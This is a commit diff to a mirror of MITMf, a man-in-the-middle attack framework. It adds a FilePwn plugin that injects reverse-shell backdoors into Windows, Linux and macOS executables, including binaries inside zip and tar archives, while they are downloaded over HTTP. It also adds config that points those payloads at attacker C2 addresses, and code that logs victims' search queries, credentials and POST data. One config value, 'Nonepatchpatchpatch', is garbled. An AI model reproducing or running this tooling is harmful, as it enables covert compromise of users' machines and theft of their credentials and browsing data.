mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-11 15:47:10 -07:00
- Updated FilePwn plugin with BDFactory v0.2 + license
- Added partial OS and Browser detection through clients user-agents - Improved jskeylogger plugin (now detects input field names) - Fixed bug where jskeylogger sent invalid charCodes on Android devices - Cleaned search engine query parsing code in ServerConnection.py - Updated setup.sh with new libs
This commit is contained in:
parent
a4e8869fc6
commit
4ae50e6e0c
8 changed files with 503 additions and 143 deletions
|
@ -1,3 +1,41 @@
|
|||
"""
|
||||
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
||||
|
||||
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
||||
|
||||
Copyright (c) 2013-2014, Joshua Pitts
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification,
|
||||
are permitted provided that the following conditions are met:
|
||||
|
||||
1. Redistributions of source code must retain the above copyright notice,
|
||||
this list of conditions and the following disclaimer.
|
||||
|
||||
2. Redistributions in binary form must reproduce the above copyright notice,
|
||||
this list of conditions and the following disclaimer in the documentation
|
||||
and/or other materials provided with the distribution.
|
||||
|
||||
3. Neither the name of the copyright holder nor the names of its contributors
|
||||
may be used to endorse or promote products derived from this software without
|
||||
specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
||||
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
||||
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
||||
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
||||
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
||||
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
||||
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
||||
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||
POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
Tested on Kali-Linux.
|
||||
|
||||
"""
|
||||
|
||||
[ZIP]
|
||||
# patchCount is the max number of files to patch in a zip file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
|
@ -10,6 +48,18 @@ maxSize = 40000000
|
|||
|
||||
blacklist = .dll, #don't do dlls in a zip file
|
||||
|
||||
[TAR]
|
||||
# patchCount is the max number of files to patch in a tar file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
# and send on it's way
|
||||
|
||||
patchCount = 5
|
||||
|
||||
# In Bytes
|
||||
maxSize = 40000000
|
||||
|
||||
blacklist = , # a comma is null do not leave blank
|
||||
|
||||
[targets]
|
||||
#MAKE SURE that your settings for host and port DO NOT
|
||||
# overlap between different types of payloads
|
||||
|
@ -18,9 +68,11 @@ blacklist = .dll, #don't do dlls in a zip file
|
|||
|
||||
LinuxType = ALL # choices: x86/x64/ALL/None
|
||||
WindowsType = ALL # choices: x86/x64/ALL/None
|
||||
FatPriority = x64 # choices: x86 or x64
|
||||
|
||||
FileSizeMax = 50000000 # ~50 MB (just under) No patching of files this large
|
||||
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
||||
|
||||
CompressedFiles = True #True/False
|
||||
[[[LinuxIntelx86]]]
|
||||
SHELL = reverse_shell_tcp # This is the BDF syntax
|
||||
HOST = 192.168.1.168 # The C2
|
||||
|
@ -30,16 +82,16 @@ blacklist = .dll, #don't do dlls in a zip file
|
|||
|
||||
[[[LinuxIntelx64]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.10.4
|
||||
PORT = 6666
|
||||
HOST = 192.168.1.16
|
||||
PORT = 9999
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
|
||||
[[[WindowsIntelx86]]]
|
||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||
HOST = 192.168.10.4
|
||||
PORT = 6666
|
||||
SHELL = iat_reverse_tcp
|
||||
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
||||
HOST = 192.168.1.16
|
||||
PORT = 8443
|
||||
SHELL = reverse_shell_tcp
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = False
|
||||
PATCH_DLL = True
|
||||
|
@ -50,7 +102,21 @@ blacklist = .dll, #don't do dlls in a zip file
|
|||
HOST = 192.168.1.16
|
||||
PORT = 8088
|
||||
SHELL = reverse_shell_tcp
|
||||
SUPPLIED_SHELLCODE = None
|
||||
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
|
||||
ZERO_CERT = True
|
||||
PATCH_DLL = False
|
||||
MSFPAYLOAD = windows/x64/shell_reverse_tcp
|
||||
|
||||
[[[MachoIntelx86]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 4444
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
|
||||
[[[MachoIntelx64]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 5555
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
|
@ -1 +1 @@
|
|||
Subproject commit 89d87b2fa1a499998a2109a751d8869e52485e0c
|
||||
Subproject commit 303d059c4c2a1ecc19824bd755129152b6ad7fc1
|
|
@ -19,6 +19,7 @@
|
|||
import logging, re, string, random, zlib, gzip, StringIO, sys
|
||||
import plugins
|
||||
|
||||
from user_agents import parse
|
||||
from twisted.web.http import HTTPClient
|
||||
from URLMonitor import URLMonitor
|
||||
from libs.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||
|
@ -46,6 +47,7 @@ class ServerConnection(HTTPClient):
|
|||
self.postData = postData
|
||||
self.headers = headers
|
||||
self.client = client
|
||||
self.clientInfo = None
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
self.hsts = URLMonitor.getInstance().isHstsBypass()
|
||||
self.plugins = ProxyPlugins.getInstance()
|
||||
|
@ -73,50 +75,25 @@ class ServerConnection(HTTPClient):
|
|||
|
||||
def sendRequest(self):
|
||||
if self.command == 'GET':
|
||||
message = "%s Sending Request: %s" % (self.client.getClientIP(), self.headers['host'])
|
||||
if self.urlMonitor.isClientLogging() is True:
|
||||
self.urlMonitor.writeClientLog(self.client, self.headers, message)
|
||||
else:
|
||||
logging.info(message)
|
||||
user_agent = parse(self.headers['user-agent'])
|
||||
self.clientInfo = "%s [type:%s-%s os:%s] " % (self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
|
||||
|
||||
logging.info(self.clientInfo + "Sending Request: %s" % self.headers['host'])
|
||||
|
||||
#Capture google searches
|
||||
if ('google' in self.headers['host']):
|
||||
if ('search' in self.uri): #and ('search' in self.uri):
|
||||
try:
|
||||
for param in self.uri.split('&'):
|
||||
if param.split('=')[0] == 'q':
|
||||
query = str(param.split('=')[1])
|
||||
if query:
|
||||
logging.info("%s is querying %s for: '%s'" % (self.client.getClientIP(), self.headers['host'], query))
|
||||
except Exception, e:
|
||||
error = str(e)
|
||||
logging.warning("%s Error parsing google search query %s" % (self.client.getClientIP(), error))
|
||||
if ('search' in self.uri):
|
||||
self.captureQueries('q')
|
||||
|
||||
#Capture bing searches
|
||||
if ('bing' in self.headers['host']):
|
||||
if ('Suggestions' in self.uri):
|
||||
try:
|
||||
for param in self.uri.split('&'):
|
||||
if param.split('=')[0] == 'qry':
|
||||
query = str(param.split('=')[1])
|
||||
if query:
|
||||
logging.info("%s is querying %s for: '%s'" % (self.client.getClientIP(), self.headers['host'], query))
|
||||
except Exception, e:
|
||||
error = str(e)
|
||||
logging.warning("%s Error parsing bing search query %s" % (self.client.getClientIP(), error))
|
||||
self.captureQueries('qry')
|
||||
|
||||
#Capture yahoo searches
|
||||
if ('search.yahoo' in self.headers['host']):
|
||||
if ('nresults' in self.uri):
|
||||
try:
|
||||
for param in self.uri.split('&'):
|
||||
if param.split('=')[0] == 'command':
|
||||
query = str(param.split('=')[1])
|
||||
if query:
|
||||
logging.info("%s is querying %s for: '%s'" % (self.client.getClientIP(), self.headers['host'], query))
|
||||
except Exception, e:
|
||||
error = str(e)
|
||||
logging.warning("%s Error parsing yahoo search query %s" % (self.client.getClientIP(), error))
|
||||
self.captureQueries('command')
|
||||
|
||||
#check for creds passed in GET requests.. It's surprising to see how many people still do this (please stahp)
|
||||
for user in self.http_userfields:
|
||||
|
@ -126,12 +103,22 @@ class ServerConnection(HTTPClient):
|
|||
password = re.findall("(" + passw + ")=([^&|;]*)", self.uri, re.IGNORECASE)
|
||||
|
||||
if (username and password):
|
||||
message = "%s %s Possible Credentials (%s):\n%s" % (self.client.getClientIP(), self.command, self.headers['host'], self.uri)
|
||||
logging.warning(message)
|
||||
logging.warning(self.clientInfo + "%s Possible Credentials (%s):\n%s" % (self.command, self.headers['host'], self.uri))
|
||||
|
||||
self.plugins.hook()
|
||||
self.sendCommand(self.command, self.uri)
|
||||
|
||||
def captureQueries(self, search_param):
|
||||
try:
|
||||
for param in self.uri.split('&'):
|
||||
if param.split('=')[0] == search_param:
|
||||
query = str(param.split('=')[1])
|
||||
if query:
|
||||
logging.info(self.clientInfo + "is querying %s for: %s" % (self.headers['host'], query))
|
||||
except Exception, e:
|
||||
error = str(e)
|
||||
logging.warning(self.clientInfo + "Error parsing google search query %s" % error)
|
||||
|
||||
def sendHeaders(self):
|
||||
for header, value in self.headers.items():
|
||||
logging.debug("Sending header: (%s => %s)" % (header, value))
|
||||
|
@ -145,11 +132,7 @@ class ServerConnection(HTTPClient):
|
|||
elif 'keylog' in self.uri:
|
||||
self.plugins.hook()
|
||||
else:
|
||||
message = "%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData)
|
||||
if self.urlMonitor.isClientLogging() is True:
|
||||
self.urlMonitor.writeClientLog(self.client, self.headers, message)
|
||||
else:
|
||||
logging.warning(message)
|
||||
logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
|
||||
self.transport.write(self.postData)
|
||||
|
||||
def connectionMade(self):
|
||||
|
|
10
mitmf.py
10
mitmf.py
|
@ -9,6 +9,16 @@ from libs.sergioproxy.ProxyPlugins import ProxyPlugins
|
|||
import sys, logging, traceback, string, os
|
||||
import argparse
|
||||
|
||||
try:
|
||||
import user_agents
|
||||
except:
|
||||
sys.exit("[-] user_agents library not installed!")
|
||||
|
||||
try:
|
||||
import configobj
|
||||
except:
|
||||
sys.exit("[-] configobj library not installed!")
|
||||
|
||||
from plugins import *
|
||||
plugin_classes = plugin.Plugin.__subclasses__()
|
||||
|
||||
|
|
|
@ -2,6 +2,44 @@
|
|||
# 99.9999999% of this code is stolen from BDFProxy - https://github.com/secretsquirrel/BDFProxy
|
||||
#################################################################################################
|
||||
|
||||
"""
|
||||
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
||||
|
||||
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
||||
|
||||
Copyright (c) 2013-2014, Joshua Pitts
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification,
|
||||
are permitted provided that the following conditions are met:
|
||||
|
||||
1. Redistributions of source code must retain the above copyright notice,
|
||||
this list of conditions and the following disclaimer.
|
||||
|
||||
2. Redistributions in binary form must reproduce the above copyright notice,
|
||||
this list of conditions and the following disclaimer in the documentation
|
||||
and/or other materials provided with the distribution.
|
||||
|
||||
3. Neither the name of the copyright holder nor the names of its contributors
|
||||
may be used to endorse or promote products derived from this software without
|
||||
specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
||||
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
||||
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
||||
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
||||
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
||||
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
||||
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
||||
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||
POSSIBILITY OF SUCH DAMAGE.
|
||||
|
||||
Tested on Kali-Linux.
|
||||
|
||||
"""
|
||||
|
||||
import sys
|
||||
import os
|
||||
import pefile
|
||||
|
@ -10,12 +48,14 @@ import logging
|
|||
import shutil
|
||||
import random
|
||||
import string
|
||||
from libs.bdfactory import pebin, elfbin
|
||||
import tarfile
|
||||
from libs.bdfactory import pebin
|
||||
from libs.bdfactory import elfbin
|
||||
from libs.bdfactory import machobin
|
||||
from plugins.plugin import Plugin
|
||||
from tempfile import mkstemp
|
||||
from configobj import ConfigObj
|
||||
|
||||
|
||||
class FilePwn(Plugin):
|
||||
name = "FilePwn"
|
||||
optname = "filepwn"
|
||||
|
@ -23,23 +63,28 @@ class FilePwn(Plugin):
|
|||
has_opts = False
|
||||
desc = "Backdoor executables being sent over http using bdfactory"
|
||||
|
||||
def convert_to_Bool(self, aString):
|
||||
if aString.lower() == 'true':
|
||||
return True
|
||||
elif aString.lower() == 'false':
|
||||
return False
|
||||
elif aString.lower() == 'none':
|
||||
return None
|
||||
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
|
||||
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload',
|
||||
'application/x-msdos-program', 'binary/octet-stream']
|
||||
#FOR FUTURE USE
|
||||
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
|
||||
|
||||
#FOR FUTURE USE
|
||||
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
|
||||
|
||||
#USED NOW
|
||||
self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
|
||||
'pe': {'number': 'MZ', 'offset': 0},
|
||||
'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
|
||||
'bz': {'number': 'BZ', 'offset': 0},
|
||||
'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
|
||||
'tar': {'number': 'ustar', 'offset': 257},
|
||||
'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
|
||||
'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
|
||||
'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
|
||||
}
|
||||
|
||||
#NOT USED NOW
|
||||
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
||||
|
||||
|
@ -51,10 +96,28 @@ class FilePwn(Plugin):
|
|||
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
|
||||
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
|
||||
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
|
||||
self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86']
|
||||
self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64']
|
||||
self.FatPriority = self.userConfig['targets']['ALL']['FatPriority']
|
||||
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
||||
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
||||
|
||||
print "[*] FilePwn plugin online"
|
||||
|
||||
def convert_to_Bool(self, aString):
|
||||
if aString.lower() == 'true':
|
||||
return True
|
||||
elif aString.lower() == 'false':
|
||||
return False
|
||||
elif aString.lower() == 'none':
|
||||
return None
|
||||
|
||||
def bytes_have_format(self, bytess, formatt):
|
||||
number = self.magicNumbers[formatt]
|
||||
if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']:
|
||||
return True
|
||||
return False
|
||||
|
||||
def binaryGrinder(self, binaryFile):
|
||||
"""
|
||||
Feed potential binaries into this function,
|
||||
|
@ -118,7 +181,7 @@ class FilePwn(Plugin):
|
|||
CAVE_JUMPING=cave_jumping,
|
||||
IMAGE_TYPE=self.WindowsType,
|
||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
|
||||
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.WindowsIntelx86['SUPPLIED_SHELLCODE']),
|
||||
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
|
||||
)
|
||||
|
||||
|
@ -126,17 +189,17 @@ class FilePwn(Plugin):
|
|||
|
||||
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
|
||||
|
||||
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=True)
|
||||
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False)
|
||||
targetFile.support_check()
|
||||
|
||||
if targetFile.class_type == 0x1:
|
||||
#x86
|
||||
#x86CPU Type
|
||||
targetFile = elfbin.elfbin(FILE=binaryFile,
|
||||
OUTPUT=os.path.basename(binaryFile),
|
||||
SHELL=self.LinuxIntelx86['SHELL'],
|
||||
HOST=self.LinuxIntelx86['HOST'],
|
||||
PORT=int(self.LinuxIntelx86['PORT']),
|
||||
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx86['SUPPLIED_SHELLCODE']),
|
||||
SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'],
|
||||
IMAGE_TYPE=self.LinuxType
|
||||
)
|
||||
result = targetFile.run_this()
|
||||
|
@ -147,24 +210,200 @@ class FilePwn(Plugin):
|
|||
SHELL=self.LinuxIntelx64['SHELL'],
|
||||
HOST=self.LinuxIntelx64['HOST'],
|
||||
PORT=int(self.LinuxIntelx64['PORT']),
|
||||
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx64['SUPPLIED_SHELLCODE']),
|
||||
SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'],
|
||||
IMAGE_TYPE=self.LinuxType
|
||||
)
|
||||
result = targetFile.run_this()
|
||||
|
||||
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
|
||||
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
|
||||
targetFile.support_check()
|
||||
|
||||
#ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
|
||||
|
||||
if targetFile.FAT_FILE is True:
|
||||
if self.FatPriority == 'x86':
|
||||
targetFile = machobin.machobin(FILE=binaryFile,
|
||||
OUTPUT = os.path.basename(binaryFile),
|
||||
SHELL=self.MachoIntelx86['SHELL'],
|
||||
HOST=self.MachoIntelx86['HOST'],
|
||||
PORT=int(self.MachoIntelx86['PORT']),
|
||||
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
||||
FAT_PRIORITY=self.FatPriority
|
||||
)
|
||||
result = targetFile.run_this()
|
||||
|
||||
elif self.FatPriority == 'x64':
|
||||
targetFile = machobin.machobin(FILE=binaryFile,
|
||||
OUTPUT = os.path.basename(binaryFile),
|
||||
SHELL=self.MachoIntelx64['SHELL'],
|
||||
HOST=self.MachoIntelx64['HOST'],
|
||||
PORT=int(self.MachoIntelx64['PORT']),
|
||||
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
||||
FAT_PRIORITY=self.FatPriority
|
||||
)
|
||||
result = targetFile.run_this()
|
||||
|
||||
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
|
||||
targetFile = machobin.machobin(FILE=binaryFile,
|
||||
OUTPUT = os.path.basename(binaryFile),
|
||||
SHELL=self.MachoIntelx86['SHELL'],
|
||||
HOST=self.MachoIntelx86['HOST'],
|
||||
PORT=int(self.MachoIntelx86['PORT']),
|
||||
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
||||
FAT_PRIORITY=self.FatPriority
|
||||
)
|
||||
result = targetFile.run_this()
|
||||
|
||||
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
|
||||
targetFile = machobin.machobin(FILE=binaryFile,
|
||||
OUTPUT = os.path.basename(binaryFile),
|
||||
SHELL=self.MachoIntelx64['SHELL'],
|
||||
HOST=self.MachoIntelx64['HOST'],
|
||||
PORT=int(self.MachoIntelx64['PORT']),
|
||||
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
||||
FAT_PRIORITY=self.FatPriority
|
||||
)
|
||||
result = targetFile.run_this()
|
||||
|
||||
return result
|
||||
|
||||
except Exception as e:
|
||||
print 'Exception', str(e)
|
||||
logging.warning("EXCEPTION IN binaryGrinder %s", str(e))
|
||||
return None
|
||||
|
||||
def zipGrinder(self, aZipFile):
|
||||
def tar_files(self, aTarFileBytes, formatt):
|
||||
"When called will unpack and edit a Tar File and return a tar file"
|
||||
|
||||
print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'
|
||||
|
||||
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
|
||||
print "[!] TarFile over allowed size"
|
||||
logging.info("TarFIle maxSize met %s", len(aTarFileBytes))
|
||||
return aTarFileBytes
|
||||
|
||||
with tempfile.NamedTemporaryFile() as tarFileStorage:
|
||||
tarFileStorage.write(aTarFileBytes)
|
||||
tarFileStorage.flush()
|
||||
|
||||
if not tarfile.is_tarfile(tarFileStorage.name):
|
||||
print '[!] Not a tar file'
|
||||
return aTarFileBytes
|
||||
|
||||
compressionMode = ':'
|
||||
if formatt == 'gz':
|
||||
compressionMode = ':gz'
|
||||
if formatt == 'bz':
|
||||
compressionMode = ':bz2'
|
||||
|
||||
tarFile = None
|
||||
try:
|
||||
tarFileStorage.seek(0)
|
||||
tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
|
||||
except tarfile.ReadError:
|
||||
pass
|
||||
|
||||
if tarFile is None:
|
||||
print '[!] Not a tar file'
|
||||
return aTarFileBytes
|
||||
|
||||
print '[*] Tar file contents and info:'
|
||||
print '[*] Compression:', formatt
|
||||
|
||||
members = tarFile.getmembers()
|
||||
for info in members:
|
||||
print "\t", info.name, info.mtime, info.size
|
||||
|
||||
newTarFileStorage = tempfile.NamedTemporaryFile()
|
||||
newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)
|
||||
|
||||
patchCount = 0
|
||||
wasPatched = False
|
||||
|
||||
for info in members:
|
||||
print "[*] >>> Next file in tarfile:", info.name
|
||||
|
||||
if not info.isfile():
|
||||
print info.name, 'is not a file'
|
||||
newTarFile.addfile(info, tarFile.extractfile(info))
|
||||
continue
|
||||
|
||||
if info.size >= long(self.FileSizeMax):
|
||||
print info.name, 'is too big'
|
||||
newTarFile.addfile(info, tarFile.extractfile(info))
|
||||
continue
|
||||
|
||||
# Check against keywords
|
||||
keywordCheck = False
|
||||
|
||||
if type(self.tarblacklist) is str:
|
||||
if self.tarblacklist.lower() in info.name.lower():
|
||||
keywordCheck = True
|
||||
|
||||
else:
|
||||
for keyword in self.tarblacklist:
|
||||
if keyword.lower() in info.name.lower():
|
||||
keywordCheck = True
|
||||
continue
|
||||
|
||||
if keywordCheck is True:
|
||||
print "[!] Tar blacklist enforced!"
|
||||
logging.info('Tar blacklist enforced on %s', info.name)
|
||||
continue
|
||||
|
||||
# Try to patch
|
||||
extractedFile = tarFile.extractfile(info)
|
||||
|
||||
if patchCount >= int(self.userConfig['TAR']['patchCount']):
|
||||
newTarFile.addfile(info, extractedFile)
|
||||
else:
|
||||
# create the file on disk temporarily for fileGrinder to run on it
|
||||
with tempfile.NamedTemporaryFile() as tmp:
|
||||
shutil.copyfileobj(extractedFile, tmp)
|
||||
tmp.flush()
|
||||
patchResult = self.binaryGrinder(tmp.name)
|
||||
if patchResult:
|
||||
patchCount += 1
|
||||
file2 = "backdoored/" + os.path.basename(tmp.name)
|
||||
print "[*] Patching complete, adding to tar file."
|
||||
info.size = os.stat(file2).st_size
|
||||
with open(file2, 'rb') as f:
|
||||
newTarFile.addfile(info, f)
|
||||
logging.info("%s in tar patched, adding to tarfile", info.name)
|
||||
os.remove(file2)
|
||||
wasPatched = True
|
||||
else:
|
||||
print "[!] Patching failed"
|
||||
with open(tmp.name, 'rb') as f:
|
||||
newTarFile.addfile(info, f)
|
||||
logging.info("%s patching failed. Keeping original file in tar.", info.name)
|
||||
if patchCount == int(self.userConfig['TAR']['patchCount']):
|
||||
logging.info("Met Tar config patchCount limit.")
|
||||
|
||||
# finalize the writing of the tar file first
|
||||
newTarFile.close()
|
||||
|
||||
# then read the new tar file into memory
|
||||
newTarFileStorage.seek(0)
|
||||
ret = newTarFileStorage.read()
|
||||
newTarFileStorage.close() # it's automatically deleted
|
||||
|
||||
if wasPatched is False:
|
||||
# If nothing was changed return the original
|
||||
print "[*] No files were patched forwarding original file"
|
||||
return aTarFileBytes
|
||||
else:
|
||||
return ret
|
||||
|
||||
def zip_files(self, aZipFile):
|
||||
"When called will unpack and edit a Zip File and return a zip file"
|
||||
|
||||
logging.info("ZipFile size: %s KB" % (len(aZipFile) / 1024))
|
||||
print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
|
||||
|
||||
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
|
||||
logging.info("ZipFIle maxSize met %s" % len(aZipFile))
|
||||
print "[!] ZipFile over allowed size"
|
||||
logging.info("ZipFIle maxSize met %s", len(aZipFile))
|
||||
return aZipFile
|
||||
|
||||
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
|
||||
|
@ -187,21 +426,24 @@ class FilePwn(Plugin):
|
|||
logging.info('Encrypted zipfile found. Not patching.')
|
||||
return aZipFile
|
||||
|
||||
logging.info("ZipFile contents and info:")
|
||||
print "[*] ZipFile contents and info:"
|
||||
|
||||
for info in zippyfile.infolist():
|
||||
logging.info("\t%s %s %s" % (info.filename, info.date_time, info.file_size))
|
||||
print "\t", info.filename, info.date_time, info.file_size
|
||||
|
||||
zippyfile.extractall(tmpDir)
|
||||
|
||||
patchCount = 0
|
||||
|
||||
wasPatched = False
|
||||
|
||||
for info in zippyfile.infolist():
|
||||
logging.info(">>> Next file in zipfile: %s" % info.filename)
|
||||
print "[*] >>> Next file in zipfile:", info.filename
|
||||
|
||||
if os.path.isdir(tmpDir + '/' + info.filename) is True:
|
||||
logging.info('%s is a directory' % info.filename)
|
||||
print info.filename, 'is a directory'
|
||||
continue
|
||||
|
||||
#Check against keywords
|
||||
keywordCheck = False
|
||||
|
||||
|
@ -216,7 +458,8 @@ class FilePwn(Plugin):
|
|||
continue
|
||||
|
||||
if keywordCheck is True:
|
||||
logging.info('Zip blacklist enforced on %s' % info.filename)
|
||||
print "[!] Zip blacklist enforced!"
|
||||
logging.info('Zip blacklist enforced on %s', info.filename)
|
||||
continue
|
||||
|
||||
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
|
||||
|
@ -224,12 +467,16 @@ class FilePwn(Plugin):
|
|||
if patchResult:
|
||||
patchCount += 1
|
||||
file2 = "backdoored/" + os.path.basename(info.filename)
|
||||
print "[*] Patching complete, adding to zip file."
|
||||
shutil.copyfile(file2, tmpDir + '/' + info.filename)
|
||||
logging.info("%s in zip patched, adding to zipfile" % info.filename)
|
||||
|
||||
logging.info("%s in zip patched, adding to zipfile", info.filename)
|
||||
os.remove(file2)
|
||||
wasPatched = True
|
||||
else:
|
||||
logging.info("%s patching failed. Keeping original file in zip." % info.filename)
|
||||
print "[!] Patching failed"
|
||||
logging.info("%s patching failed. Keeping original file in zip.", info.filename)
|
||||
|
||||
print '-' * 10
|
||||
|
||||
if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
|
||||
logging.info("Met Zip config patchCount limit.")
|
||||
|
@ -239,12 +486,12 @@ class FilePwn(Plugin):
|
|||
|
||||
zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
|
||||
|
||||
logging.debug("Writing to zipfile: %s" % tmpFile)
|
||||
print "[*] Writing to zipfile:", tmpFile
|
||||
|
||||
for base, dirs, files in os.walk(tmpDir):
|
||||
for afile in files:
|
||||
filename = os.path.join(base, afile)
|
||||
logging.debug('[*] Writing filename to zipfile: %s' % filename.replace(tmpDir + '/', ''))
|
||||
print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
|
||||
zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
|
||||
|
||||
zipResult.close()
|
||||
|
